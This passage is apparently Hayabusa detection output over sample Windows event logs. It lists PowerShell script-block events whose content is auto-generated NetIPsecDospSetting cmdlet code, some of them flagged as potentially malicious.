[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetNa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"letization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetNa",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"me='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name 
= 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value 
= $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) 
{ [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterEx",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"me='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, 
$script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent 
